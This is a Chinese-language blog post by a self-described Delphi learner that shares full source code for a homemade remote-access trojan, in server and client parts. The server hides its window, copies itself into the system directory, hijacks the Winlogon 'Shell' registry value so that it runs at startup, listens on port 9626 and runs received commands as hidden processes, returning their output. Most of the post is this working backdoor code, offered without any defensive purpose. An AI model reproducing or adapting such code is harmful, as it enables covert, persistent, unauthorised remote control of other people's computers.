刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!
程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一自动行启动项,打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行,最后把回显传送回客户端。客户端很简单,跟服务端连接成功后,输入命令点执行,正常的话可以收到服务端的执行结果了。
源码如下:
////Server.pas//////////////
unit UtMain;
////////////////////////////////////
//////////BY lanyus////////////////
////////Email:greathjw@163.com////
////////QQ:231221////////////////
///部分代码从网上收集///////////
////////////////////////////////
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;
type
TFmMain = class(TForm)
SS: TServerSocket;
Memo1: TMemo;
procedure FormCreate(Sender: TObject);
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;
var
FmMain: TFmMain;
reg:TRegistry;
implementation
{$R *.dfm}
procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200; //运行不显示窗口
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
reg.WriteString('Shell','Explorer.exe Lysvr.exe'); //建立开机启动项
reg.Free;
GetSystemDirectory(sysdir,50);
if not FileExists(sysdir+'\Lysvr.exe') then
copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);
SS.Port:=9626;
try
SS.Active:=True;
except
end;
end;
procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText('连接成功'); //发现有连接时回传‘连接成功 ’
end;
procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFORMATION;
cchReadBuffer:DWORD;
ph:PChar;
fname:PChar;
res:string;
begin
Memo1.Clear;
remotecmd:=Socket.ReceiveText;
fname:=allocmem(255);
ph:=AllocMem(5000);
lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
lsa.lpSecurityDescriptor :=nil;
lsa.bInheritHandle :=True;
if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
begin
socket.SendText('不能创建管道');
exit;
end;
fillchar(si,sizeof(STARTUPINFO),0);
si.cb:=sizeof(STARTUPINFO);
si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
si.wShowWindow:=SW_HIDE;
si.hStdOutput:=hWritePipe;
StrPCopy(fname,remotecmd);
/////执行CMD命令////
if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
begin
socket.SendText('不能创建进程');
FreeMem(ph);
FreeMem(fname);
Exit;
end;
while(true) do
begin
if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;
if cchReadBuffer<>0 then
begin
if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
ph[cchReadbuffer]:=chr(0);
Memo1.Lines.Add(ph);
end
else
if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;
Sleep(100);
end;
ph[cchReadBuffer]:=chr(0);
Memo1.Lines.Add(ph); //memo接收回显
CloseHandle(hReadPipe);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(hWritePipe);
FreeMem(ph);
FreeMem(fname);
socket.SendText(Memo1.Text); ///将回显发送回客户端
end;
end.
///////////////////////////////////////////////////////////////////////////////////////////
//////客户端/////////////////////
unit UtMain;
////////////////////////////////////
//////////BY lanyus////////////////
////////Email:greathjw@163.com////
////////QQ:231221////////////////
////////////////////////////////
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;
type
TFmMain = class(TForm)
WebBrowser1: TWebBrowser;
Label3: TLabel;
Edit2: TEdit;
Label4: TLabel;
Edit3: TEdit;
Button2: TButton;
CS: TClientSocket;
Edit4: TEdit;
Label5: TLabel;
Memo1: TMemo;
BitBtn2: TBitBtn;
procedure Button2Click(Sender: TObject);
procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
procedure BitBtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
FmMain: TFmMain;
implementation
{$R *.dfm}
procedure TFmMain.Button2Click(Sender: TObject);
begin
CS.Host:=Edit2.Text;
CS.Port:=StrToInt(Edit3.Text);
CS.Open;
end;
procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
begin
Memo1.Clear;
Memo1.Lines.Add(Socket.ReceiveText);
Memo1.Lines.Add('');
end;
procedure TFmMain.BitBtn2Click(Sender: TObject);
begin
CS.Socket.SendText(edit4.Text);
end;
end.
|
